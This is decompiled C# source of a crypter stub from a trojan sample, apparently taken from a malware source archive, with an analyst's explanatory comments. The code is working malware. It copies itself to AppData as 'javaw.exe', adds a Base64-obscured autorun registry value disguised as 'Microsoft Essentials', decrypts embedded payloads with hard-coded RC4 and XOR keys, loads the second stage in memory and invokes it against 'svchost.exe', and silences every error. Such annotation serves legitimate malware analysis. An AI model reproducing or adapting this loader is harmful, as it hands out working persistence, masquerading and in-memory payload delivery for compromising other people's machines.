MalwareSourceCode/MSIL/Trojan/Win32/J/Trojan.Win32.Jorik.IRCbot.anj-296f7eecb994ab8b677ff5c7ad9abb7039c800cf5860ac2945e044e236dabf27/Program.cs


2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: CrypterSource.Program
// Assembly: AryanF, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2EB8EB51-C97D-4251-9393-007DD226E453
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Jorik.IRCbot.anj-296f7eecb994ab8b677ff5c7ad9abb7039c800cf5860ac2945e044e236dabf27.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Text;
namespace CrypterSource
{
/// <summary>
/// Decompiled entry class of a crypter stub (namespace CrypterSource). Analyst summary of what
/// the visible code does: it copies itself under a benign-looking file name, registers that copy
/// in a per-user autorun key, decrypts two embedded resources and hands the first one to a
/// reflectively loaded second stage.
/// Indicators visible in this file: file "%APPDATA%\javaw.exe", autorun value name
/// "Microsoft Essentials", resource set "files", resource names "_CLRb98hOPqbyekD5To7d" and
/// "lolumad", and the target string "svchost.exe".
/// </summary>
internal class Program
{
/// <summary>
/// Stub entry point: self-copy, autorun registration, resource decryption, reflective invoke.
/// Every step sits in one try block with an empty catch, so any failure ends Main silently.
/// </summary>
private static void Main()
{
try
{
// Self-copy to the roaming AppData root as "javaw.exe" (masquerades as the Java launcher).
// This File.Copy overload does not overwrite: if the destination already exists it throws,
// the empty catch below absorbs it, and none of the following statements run.
File.Copy(Assembly.GetExecutingAssembly().Location, Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe");
// The Base64 literal decodes to "Software\Microsoft\Windows\CurrentVersion\Run"; it is only
// encoded to keep the key path out of a plain string scan. The statement writes the HKCU Run
// value "Microsoft Essentials" pointing at the copied file, i.e. logon persistence for the
// current user.
Registry.CurrentUser.OpenSubKey(Encoding.ASCII.GetString(Convert.FromBase64String("U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu")), true).SetValue("Microsoft Essentials", (object) (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\javaw.exe"), RegistryValueKind.String);
// Both later stages are embedded in this assembly's "files" resource set.
ResourceManager resourceManager = new ResourceManager("files", Assembly.GetExecutingAssembly());
// First resource: decoded with PolyRevDecrypt and a hard-coded password. Its content is not
// visible here; it is passed on below as the first argument of Run.
byte[] numArray = Program.PolyRevDecrypt((byte[]) resourceManager.GetObject("_CLRb98hOPqbyekD5To7d"), "_uxiONH6s");
// Second resource: RC4-decrypted with a hard-coded key and loaded from the byte array with
// Assembly.Load, so this code never writes the second-stage assembly to disk. The first type
// it exposes is used.
Type type = Assembly.Load(Program.RC4((byte[]) resourceManager.GetObject("lolumad"), "_FmEb1ONweckrT3iv")).GetTypes()[0];
// Calls Run(byte[] payload, string target) on a fresh instance via reflection.
// NOTE(review): Run lives in the encrypted resource and is not visible here; the
// "svchost.exe" argument suggests the payload is started under or inside that process name.
// Confirm by decrypting "lolumad" with the RC4 routine below.
type.GetMethod("Run").Invoke(Activator.CreateInstance(type), new object[2]
{
(object) numArray,
(object) "svchost.exe"
});
}
catch
{
// Deliberately empty: all exceptions are swallowed, so the sample produces no error output.
}
}
/// <summary>
/// Textbook RC4 (key schedule followed by keystream XOR). Because RC4 is symmetric, the same
/// call decrypts the embedded resource.
/// </summary>
/// <param name="bytes">Buffer to transform; it is XORed in place and the same array is returned.</param>
/// <param name="Key">Key string, converted to bytes with ASCII encoding.</param>
/// <returns>The input array after the in-place XOR with the keystream.</returns>
public static byte[] RC4(byte[] bytes, string Key)
{
byte[] bytes1 = Encoding.ASCII.GetBytes(Key);
// numArray1 is the 256-byte RC4 state; numArray2 is the key repeated to 256 bytes.
byte[] numArray1 = new byte[256];
byte[] numArray2 = new byte[256];
for (int index = 0; index < 256; ++index)
{
numArray1[index] = (byte) index;
numArray2[index] = bytes1[index % bytes1.GetLength(0)];
}
// Key-scheduling pass: permute the state using the repeated key.
int index1 = 0;
for (int index2 = 0; index2 < 256; ++index2)
{
index1 = (index1 + (int) numArray1[index2] + (int) numArray2[index2]) % 256;
byte num = numArray1[index2];
numArray1[index2] = numArray1[index1];
numArray1[index1] = num;
}
// Keystream generation: one state swap and one keystream byte per input byte.
int index3;
int index4 = index3 = 0;
for (int index5 = 0; index5 < bytes.GetLength(0); ++index5)
{
index4 = (index4 + 1) % 256;
index3 = (index3 + (int) numArray1[index4]) % 256;
byte num = numArray1[index4];
numArray1[index4] = numArray1[index3];
numArray1[index3] = num;
int index6 = ((int) numArray1[index4] + (int) numArray1[index3]) % 256;
bytes[index5] ^= numArray1[index6];
}
return bytes;
}
/// <summary>
/// Custom XOR decoder used for the first embedded resource. The input is reversed, the last
/// byte of the reversed buffer serves as a per-blob salt, and each byte is XORed with that salt
/// and with one password byte.
/// </summary>
/// <param name="data">Encoded blob; it is reversed in place, so the caller's array is modified.</param>
/// <param name="pass">Password string, converted to bytes with ASCII encoding.</param>
/// <returns>A new array of data.Length - 1 decoded bytes.</returns>
public static byte[] PolyRevDecrypt(byte[] data, string pass)
{
Array.Reverse((Array) data);
// After the reversal the last element is the first byte of the blob as stored; it is the salt.
byte num = data[data.Length - 1];
byte[] bytes = Encoding.ASCII.GetBytes(pass);
// The output buffer is one byte longer than the input; the surplus is trimmed after the loop.
byte[] array = new byte[data.Length + 1];
int index1 = 0;
for (int index2 = 0; index2 <= data.Length - 1; ++index2)
{
array[index2] = (byte) ((uint) data[index2] ^ (uint) num ^ (uint) bytes[index1]);
// The password bytes are reversed in place after every output byte while index1 keeps
// advancing and wrapping, so the effective key byte alternates between the forward and the
// reversed ordering.
Array.Reverse((Array) bytes);
if (index1 == bytes.Length - 1)
index1 = 0;
else
++index1;
}
// Drops the last two slots: the one computed from the salt byte itself and the extra slot
// that was never written.
Array.Resize<byte>(ref array, array.Length - 2);
return array;
}
/// <summary>
/// Empty method with a random-looking name; nothing in this file calls it.
/// NOTE(review): probably filler emitted by the crypter builder to vary the stub. The source
/// does not confirm this.
/// </summary>
private static void OHNADWHOWADHohdwAOHD()
{
}
}
}